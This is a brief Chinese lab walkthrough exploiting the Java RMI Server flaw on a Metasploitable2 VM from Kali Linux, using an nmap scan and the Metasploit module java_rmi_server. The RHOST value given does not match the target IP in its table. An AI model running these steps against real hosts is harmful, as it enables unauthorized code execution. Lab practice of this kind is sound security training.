环境
主机 | 地址 |
---|---|
Metasploitable2 | 192.168.232.202 |
kali-linux | 192.168.232.129 |
原理
- Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行
漏洞利用
第一步 ,查看1099端口是否开启
Nmap –p 0-65535 192.168.232.202
第二步选择漏洞库
msfconsole
search rmi
use exploit/multi/misc/java_rmi_server
第三步 设置参数,开始攻击
show options
Set RHOST 192.168.160.131 设置要攻击的IP
exploit
第四步 利用成功,
摘抄
帆起远航,不惧风浪,
心之所向,势不可挡